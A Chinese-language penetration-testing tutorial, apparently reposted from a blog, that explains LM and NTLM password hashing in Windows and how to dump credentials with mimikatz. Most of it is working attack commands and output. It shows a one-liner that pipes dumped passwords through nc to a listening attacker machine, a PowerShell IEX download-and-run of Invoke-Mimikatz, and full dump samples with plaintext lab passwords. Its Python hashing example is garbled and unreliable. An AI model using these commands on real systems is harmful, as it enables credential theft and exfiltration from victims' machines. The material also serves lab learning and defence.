Windows⽤户密码的加密⽅法与破解
再研究Hastcat的时候涉及到了Windows的Hash破解,感觉这个地⽅还是有⼀些姿势点和细节的,特此写⽂章记录之。
Hash简介
Hash ⼀般翻译为“散列”,也可直接⾳译为“哈希”的。这个加密函数对⼀个任意长度的字符串数据进⾏⼀次加密函数运算,然后返回⼀个固定长度的字符串。Hash主要⽤于信息安全领域中加密算法,渗透测试中获取⽬标系统的明⽂或Hash往往是整个渗透测试过程中重要的⼀环。在Windows系统中本机⽤户的密码Hash是放在本地的SAM⽂件⾥⾯,域内⽤户的密码Hash是存在域控的NTDS.DIT⽂件⾥⾯。
Windows Hash分类
LM
LM Hash简介
LAN Manager(LM)哈希是Windows系统所⽤的第⼀种密码哈希算法,是⼀种较古⽼的Hash,在LAN Manager协议中使⽤,⾮常容易通过暴⼒破解获取明⽂凭据。它只有唯⼀⼀个版本且⼀直⽤到了NT LAN
Manager(NTLM)哈希的出现,在Windows Vista/Windows 7/Windows Server 2008以及后⾯的系统中,LM哈希算法是默认关闭的,LM算法是在DES基础上实现的,不区分字母⼤⼩写。
LM Hash⽣成原理
1. ⽤户的密码转换为⼤写,密码转换为16进制字符串,不⾜14字节将会⽤0来再后⾯补全。
2. 密码的16进制字符串被分成两个7byte部分。每部分转换成⽐特流,并且长度位56bit,长度不⾜使⽤0在左边补齐长度
3. 再分7bit为⼀组,每组末尾加0,再组成⼀组
4. 上步骤得到的⼆组,分别作为key 为 KGS!@#$%进⾏DES加密。
5. 将加密后的两组拼接在⼀起,得到最终LM HASH值。
LM Hash缺点
1. 密码长度最⼤只能为14个字符
2. 密码不区分⼤⼩写
3. 如果密码强度是⼩于7位,那么第⼆个分组加密后的结果肯定是aad3b435b51404ee
4. Des密码强度不⾼
NTLM
NTLM Hash简介
NT LAN Manager(NTLM)哈希是Windows系统认可的另⼀种算法,⽤于替代古⽼的LM-Hash,⼀般指Windows系统下Security Account Manager(SAM)中保存的⽤户密码hash,在Windows Vista/Windows 7/Windows Server 2008以及后⾯的系统
中,NTLM哈希算法是默认启⽤的。
NTLM Hash⽣成原理
1. 先将⽤户密码转换为⼗六进制格式。
2. 将⼗六进制格式的密码进⾏Unicode编码。
3. 使⽤MD4摘要算法对Unicode编码数据进⾏Hash计算
Python
python2 -c 'import hashlib,binascii; print binascii.w("md4", "P@ssw0rd".encode("utf-16le")).digest())'
e19ccf75ee54e06b06a5907af13cef42
Windows Hash抓取
mimikatz
Mimikatz是⼀个开源的项⽬,⽤于Windows下读取已经登录过的⽤户Hash和明⽂密码,要顺利的读取密
码必须具有Admin或者System权限,所以它也是内⽹渗透神器之⼀。
本地交互式抓取
运⾏,弹出mimikatz的窗⼝,输⼊如下命令:
显⽰您是否具有适当的权限来继续:
mimikatz # privilege::debug
启动⽇志记录功能:
mimikatz # log
输出存储在此计算机上的所有明⽂密码:
mimikatz # sekurlsa::logonpasswords
此时会在当前shell运⾏的⽬录下⽣成mimikatz.log,这⾥⾯记录了抓取密码的⼀些详细情况。
本地⾮交互式抓取
在⾼权限的CMD命令⾏下直接运⾏:
Bash
< "privilege::debug" "sekurlsa::logonpasswords" exit >
此时会在当前shell运⾏的⽬录下⽣成,这⾥⾯记录了抓取密码的⼀些详细情况。
远程⾮交互式抓取
实验环境
设备详情IP地址担任⾓⾊
macOS10.211.55.2攻击者
Windows 7 SP 110.211.55.12被攻击者
本次实验使⽤ncat来做消息反弹,不知道ncat命令的同学可以参考我的这篇⽂章:
macOS
macOS本机提前做好监听:
Bash
ncat -lvp 2333
国光我本⼈更喜欢ncat命令多⼀点,具体看个⼈喜好。
Windows
这⾥为了⽅便我把nc.exe上传到了的同⽬录下了:
Bash
C:\mimikatz_trunk\x64& "privilege::debug" "sekurlsa::logonpasswords" exit | nc -v 10.211.55.2 2333
DNS fwd/rev mismatch: GG != GG.lan
GG [10.211.55.2] 2333 (?) open
效果
这样操作完成后,即不在⽬标系统上留下任何⽂件,直接把抓取到的结果⽤nc发送到指定的远程机,此时macOS这边已经拿到返回的密码信息了:
powershell加载mimikatz抓取
⽬标机器可以连接外⽹的情况下:
Powershell
powershell IEX (New-Object Net.WebClient).DownloadString('raw.githubusercontent/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimik atz.ps1'); Invoke-Mimikatz
内⽹的情况下可将脚本下载下来,⾃⼰搭建⼀个本地的Web服务器,通过内⽹IP去访问:
powershell创建目录Powershell
powershell IEX (New-Object Net.WebClient).DownloadString('10.211.55.2/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
各个系统版本的抓取样本
Windows Server 2003 R2
Authentication Id : 0 ; 420302 (00000000:000669ce)
Session : Interactive from 0
User Name : Administrator
Domain : GG6043
Logon Server : GG6043
Logon Time : 2019-11-18 20:51:21
SID : S-1-5-21-3664143716-1376148344-336540569-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GG6043
* LM : 896108c0bbf35b5caad3b435b51404ee
* NTLM : f6502cbe4802f94ab472288970c124cd
* SHA1 : 669c9b60b44e10aaa8784563c9a5381c9300235a
wdigest :
* Username : Administrator
* Domain : GG6043
* Password : P@ss123
kerberos :
* Username : Administrator
* Domain : GG6043
* Password : P@ss123
ssp :
credman :
主要有如下的关键信息:
类型值
⽤户名Administrator
明⽂P@ss123
LM896108c0bbf35b5caad3b435b51404ee NTLM f6502cbe4802f94ab472288970c124cd Windows Server 2008 R2
Authentication Id : 0 ; 224455 (00000000:00036cc7)
Session : Interactive from 2
User Name : Administrator
Domain : GGF140
Logon Server : GGF140
Logon Time : 2019/11/18 23:32:08
SID : S-1-5-21-3111474477-815050075-712084324-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GGF140
* LM : 921988ba001dc8e14a3b108f3fa6cb6d
* NTLM : e19ccf75ee54e06b06a5907af13cef42
* SHA1 : 9131834cf4378828626b1beccaa5dea2c46f9b63
tspkg :
* Username : Administrator
* Domain : GGF140
* Password : P@ssw0rd
wdigest :
* Username : Administrator
* Domain : GGF140
* Password : P@ssw0rd
kerberos :
* Username : Administrator
* Domain : GGF140
* Password : P@ssw0rd
ssp :
credman :
Windows Server 2008 R2 默认的配置还是可以读取到LM类型的Hash的,与⽹上的理论不符合,说明WIndows Server 2008 R2 与Windows 7 依然没有完全禁⽤掉LM类型的Hash
Windows 7 SP1
Authentication Id : 0 ; 2006207 (00000000:001e9cbf)
Session : Interactive from 2
User Name : Administrator
Domain : GG37BE
Logon Server : GG37BE
Logon Time : 2019/11/18 22:36:13
SID : S-1-5-21-1996198258-1617865379-4184567355-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GG37BE
* LM : 921988ba001dc8e14a3b108f3fa6cb6d
* NTLM : e19ccf75ee54e06b06a5907af13cef42
* SHA1 : 9131834cf4378828626b1beccaa5dea2c46f9b63
tspkg :
* Username : Administrator
* Domain : GG37BE
* Password : P@ssw0rd
wdigest :
* Username : Administrator
* Domain : GG37BE
* Password : P@ssw0rd
kerberos :
* Username : Administrator
* Domain : GG37BE
* Password : P@ssw0rd
ssp :
credman :
主要有如下的关键信息:
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论